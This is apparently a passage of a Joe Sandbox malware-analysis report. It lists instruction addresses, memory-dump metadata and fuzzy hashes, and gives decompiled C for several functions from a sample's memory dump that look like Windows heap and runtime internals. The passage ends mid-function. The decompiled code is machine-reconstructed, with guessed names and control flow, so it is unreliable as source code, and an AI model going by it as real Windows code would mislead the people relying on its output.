                    0x00000000
                    0x016d7afb
                    0x016d7afc
                    0x016d7afe
                    0x00000000
                    0x00000000
                    0x016d7b00
                    0x016d7b03
                    0x00000000
                    0x00000000
                    0x016d7b05
                    0x016d7b09
                    0x016d7b0d
                    0x016d7b0f
                    0x00000000
                    0x00000000
                    0x016d7b18
                    0x016d7b1d
                    0x00000000
                    0x016d7b1d
                    0x016d7ab7
                    0x016d7ab9
                    0x00000000
                    0x00000000
                    0x016d7abf
                    0x016d7ac1
                    0x00000000
                    0x00000000
                    0x016d7ac3
                    0x016d7ac6
                    0x00000000
                    0x00000000
                    0x016d7ac8
                    0x016d7acc
                    0x016d7ad0
                    0x016d7ad2
                    0x00000000
                    0x00000000
                    0x016d7adb
                    0x00000000
                    0x016d7adb
                    0x016d79d6
                    0x016d79d9
                    0x016d79dc
                    0x016d7a91
                    0x016d7a94
                    0x00000000
                    0x016d7a94
                    0x016d79e2
                    0x00000000
                    0x016d79e2
                    0x016d7a74
                    0x016d7a7a
                    0x00000000
                    0x00000000
                    0x016d7a8a
                    0x016d7a21
                    0x016d7a21
                    0x00000000
                    0x016d7a21
                    0x0166c650
                    0x0166c651
                    0x0166c656
                    0x0166c65c
                    0x0166c65d
                    0x0166c663
                    0x0166c664
                    0x0166c66a
                    0x0166c66e
                    0x016d79c5
                    0x016d79c7
                    0x00000000
                    0x016d79c7
                    0x0166c67a
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ccf1f3b97a415ec82367ce5afe44b00662709306c387b8718748c11a871b658
                    • Instruction ID: bf00d90f91f536c3dbfa25641c924ee6e27fb74464aa66b8b8559664357622e4
                    • Opcode Fuzzy Hash: 7ccf1f3b97a415ec82367ce5afe44b00662709306c387b8718748c11a871b658
                    • Instruction Fuzzy Hash: DC81A176A042069BDB26CE58CC80A7A77E5FB84358F18486EEE45DB345D330ED41CBA3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169138B Relevance: .2, Instructions: 206COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E0169138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E01690678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E016A9660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E01687D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0172138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E016916C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E0172A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E0168B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E0168A830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E0172A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}































                    0x0169139f
                    0x016913a1
                    0x016913a4
                    0x016913a6
                    0x016913ab
                    0x016913b3
                    0x016d5522
                    0x00000000
                    0x016d5522
                    0x016913b9
                    0x016913c1
                    0x016913c4
                    0x016913cd
                    0x016913d0
                    0x016913d9
                    0x016913dc
                    0x016913df
                    0x016913e4
                    0x016d552b
                    0x00000000
                    0x00000000
                    0x016d5534
                    0x016d553f
                    0x016d5545
                    0x016d5549
                    0x016d554a
                    0x016d554f
                    0x016d5550
                    0x016d5559
                    0x016d551c
                    0x00000000
                    0x016d551c
                    0x016d5562
                    0x016d5574
                    0x016d5564
                    0x016d556d
                    0x016d556d
                    0x016d557c
                    0x016d5597
                    0x016d5597
                    0x016d559f
                    0x016d55a2
                    0x016d55a5
                    0x016d55a5
                    0x016913ec
                    0x016913f2
                    0x016913f4
                    0x016913f8
                    0x016913fe
                    0x01691400
                    0x01691406
                    0x01691412
                    0x01691419
                    0x016d55b0
                    0x016d55b5
                    0x016d55b8
                    0x016d55b8
                    0x01691425
                    0x01691429
                    0x0169142c
                    0x0169142f
                    0x01691432
                    0x01691435
                    0x0169143a
                    0x0169143d
                    0x01691443
                    0x01691446
                    0x01691449
                    0x01691450
                    0x01691453
                    0x01691459
                    0x0169145f
                    0x01691462
                    0x01691467
                    0x016914fa
                    0x0169146d
                    0x0169146d
                    0x0169146d
                    0x0169146f
                    0x01691479
                    0x01691480
                    0x01691507
                    0x01691508
                    0x01691510
                    0x016d55c1
                    0x016d55c2
                    0x016d55cc
                    0x016d55d1
                    0x016d55d4
                    0x016d55d7
                    0x016d55d7
                    0x01691482
                    0x01691482
                    0x01691482
                    0x01691484
                    0x0169149b
                    0x016914a4
                    0x016914ae
                    0x016914b4
                    0x016914b4
                    0x016914ba
                    0x016914c4
                    0x016914c4
                    0x016914c9
                    0x016914cf
                    0x016914d2
                    0x016914d7
                    0x016d55df
                    0x016d55e0
                    0x016d55ea
                    0x016914dd
                    0x016914dd
                    0x016914df
                    0x016914e2
                    0x016914e4
                    0x016914e4
                    0x016914e7
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                    • Instruction ID: 03c87d3030544fd60df8d22ab085baae83d8502debd2e30e234597c2dad9857f
                    • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                    • Instruction Fuzzy Hash: BC819B75A003469FDB25CF68C844BAABBF9FF49310F24856AE956C7751D330EA41CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016FB8D0 Relevance: .2, Instructions: 199COMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E016FB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1757b9c; // 0x0
				_t124 = L01684620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E016A9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E016A95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E016A95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L016877F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E016A9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E016A95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1757b9c; // 0x0
									_t92 = L01684620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E016A9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0166A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E016FE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E016FE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E016A95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                    0x016fb8d9
                    0x016fb8e4
                    0x00000000
                    0x016fb8e6
                    0x016fb8f3
                    0x016fb8f5
                    0x016fb8f5
                    0x016fb8f8
                    0x016fb920
                    0x016fb924
                    0x016fb936
                    0x016fb939
                    0x016fb93d
                    0x016fb948
                    0x016fb9a0
                    0x016fb9a0
                    0x016fb9a4
                    0x016fb9bf
                    0x016fb9c4
                    0x016fb9c6
                    0x016fb9cd
                    0x016fb9d1
                    0x016fbad4
                    0x016fbad8
                    0x016fbada
                    0x016fbadc
                    0x016fbadc
                    0x016fbadf
                    0x016fbae0
                    0x016fbae2
                    0x016fbae4
                    0x016fbaec
                    0x016fbaee
                    0x016fbaf0
                    0x016fbaf0
                    0x016fbaec
                    0x016fbafb
                    0x016fbafc
                    0x016fbafe
                    0x016fbb01
                    0x016fbb01
                    0x00000000
                    0x016fbb06
                    0x016fb9d7
                    0x016fb9db
                    0x016fb9db
                    0x016fb9de
                    0x016fb9de
                    0x016fb9e4
                    0x016fb9e7
                    0x016fb9ea
                    0x016fb9ec
                    0x016fb9ef
                    0x016fb9f3
                    0x016fba1b
                    0x016fba1b
                    0x016fba23
                    0x016fba24
                    0x016fba27
                    0x016fba2a
                    0x016fba2b
                    0x016fba2e
                    0x016fba30
                    0x016fba37
                    0x016fba3f
                    0x016fba9c
                    0x016fbaa2
                    0x016fbb13
                    0x016fbb15
                    0x016fbaae
                    0x016fbaae
                    0x016fbab3
                    0x016fbab5
                    0x016fbaba
                    0x016fbac8
                    0x016fbac8
                    0x016fbaba
                    0x016fbacd
                    0x016fbacf
                    0x00000000
                    0x016fbacf
                    0x016fbb1a
                    0x00000000
                    0x016fbb1c
                    0x016fbaa7
                    0x016fbb11
                    0x00000000
                    0x016fbb11
                    0x016fbaa9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016fba41
                    0x016fba41
                    0x016fba41
                    0x016fba58
                    0x016fba5d
                    0x016fba62
                    0x00000000
                    0x00000000
                    0x016fba64
                    0x016fba67
                    0x016fba68
                    0x016fba69
                    0x016fba6c
                    0x016fba6f
                    0x016fba71
                    0x016fba78
                    0x016fba80
                    0x00000000
                    0x00000000
                    0x016fba90
                    0x016fba90
                    0x016fba97
                    0x00000000
                    0x016fba97
                    0x016fb9f5
                    0x016fb9f7
                    0x016fb9f7
                    0x016fb9fa
                    0x016fba03
                    0x016fba07
                    0x016fba0c
                    0x016fba10
                    0x016fba17
                    0x00000000
                    0x016fb9f7
                    0x016fb9a6
                    0x016fb9a8
                    0x016fb9af
                    0x016fb9b3
                    0x00000000
                    0x00000000
                    0x016fb9b9
                    0x00000000
                    0x016fb9b9
                    0x016fb94d
                    0x016fb98f
                    0x016fb995
                    0x016fb999
                    0x016fb960
                    0x016fb967
                    0x016fb968
                    0x016fb96a
                    0x00000000
                    0x016fb96a
                    0x016fb99b
                    0x016fb99e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016fb99e
                    0x016fb951
                    0x016fb954
                    0x016fb95a
                    0x016fb95e
                    0x016fb972
                    0x016fb979
                    0x016fb97d
                    0x016fb97f
                    0x016fb980
                    0x016fb982
                    0x016fb984
                    0x00000000
                    0x016fb984
                    0x00000000
                    0x016fb926
                    0x00000000
                    0x016fb926

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fc638d8e3db476cf46472a4184f2c89928d3c55ba8898e7abc9d7841a9621c3
                    • Instruction ID: afbb34fdd342dec37f68e4f1080bb9771e14c48ccdcd224fe005d864e84f5e44
                    • Opcode Fuzzy Hash: 4fc638d8e3db476cf46472a4184f2c89928d3c55ba8898e7abc9d7841a9621c3
                    • Instruction Fuzzy Hash: 8571FE32200706AFE732DF18CC45F66BBE6EB44720F25452CEB558B6A0DB75E945CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E6DC9 Relevance: .2, Instructions: 199COMMON
                    Download Yara Rule
                    C-Code - Quality: 79%
                    			E016E6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E016E6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01687D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E016A9AE0();
					_t87 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E016E795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E016E795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E016E795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E016E795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01684620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E016E6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E016E6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E016E6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E016E6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01687D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E016A9AE0();
								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01682400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01682400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01682400( &_v52);
							}
							if(_v28 >= 0) {
								return L01682400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                    0x016e6dd4
                    0x016e6dde
                    0x016e6de1
                    0x016e6de3
                    0x016e6de6
                    0x016e6de9
                    0x016e6dec
                    0x016e6def
                    0x016e6df2
                    0x016e6df5
                    0x016e6dfe
                    0x016e6e04
                    0x016e6e09
                    0x016e6e0d
                    0x016e6e18
                    0x016e6e1b
                    0x016e6e22
                    0x016e6e2d
                    0x016e6e30
                    0x016e6e36
                    0x016e6e42
                    0x016e6e4d
                    0x016e6e50
                    0x016e6e55
                    0x016e6e5c
                    0x016e6e6e
                    0x016e6e5e
                    0x016e6e67
                    0x016e6e67
                    0x016e6e73
                    0x016e6e74
                    0x016e6e77
                    0x016e6e7c
                    0x016e6e7d
                    0x016e6e8e
                    0x016e6e93
                    0x016e6e9c
                    0x016e6ea8
                    0x016e6eab
                    0x016e6eac
                    0x016e6eb3
                    0x016e6ecd
                    0x016e6edc
                    0x016e6ee2
                    0x016e6ee5
                    0x016e6ef2
                    0x016e6efb
                    0x016e6f01
                    0x016e6f06
                    0x016e6f0b
                    0x016e6f11
                    0x016e6f1a
                    0x016e6f22
                    0x016e6f26
                    0x016e6f26
                    0x016e6f33
                    0x016e6f41
                    0x016e6f44
                    0x016e6f47
                    0x016e6f54
                    0x016e6f65
                    0x016e6f77
                    0x016e6f7c
                    0x016e6f82
                    0x016e6f91
                    0x016e6f99
                    0x016e6fa3
                    0x016e6fae
                    0x016e6fae
                    0x016e6fba
                    0x016e6fbb
                    0x016e6fbc
                    0x016e6fc1
                    0x016e6fc2
                    0x016e6fd3
                    0x016e6fd8
                    0x016e6fd8
                    0x016e6fdf
                    0x016e6fe8
                    0x016e6fee
                    0x016e6fee
                    0x016e6ff5
                    0x016e6ffb
                    0x016e6ffb
                    0x016e7004
                    0x00000000
                    0x016e700a
                    0x016e7004
                    0x016e6eb3
                    0x016e6e9c
                    0x016e7015

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                    • Instruction ID: 721a0a5a64c43bb60c8227dc5506574ef665973ab0f23b991d1dc8502a78457c
                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                    • Instruction Fuzzy Hash: A1717171A01219EFDB10DFA8CD44AEEBBF9FF58714F104569E505E7250EB30AA41CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016652A5 Relevance: .2, Instructions: 161COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E016652A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0167EEF0(0x17579a0);
					_t104 =  *0x1758210; // 0x1202c70
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0167EB70(_t93, 0x17579a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E016A9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0167EEF0(0x17579a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0167EB70(0, 0x17579a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1202c7d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0169F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0167EEF0(0x17579a0);
									__eflags =  *0x1758210 - _t104; // 0x1202c70
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1758210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E016E4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0167EB70(_t95, 0x17579a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016A95D0();
											L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016A95D0();
											L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0167EB70(_t93, 0x17579a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E016A95D0();
										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E016A95D0();
										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
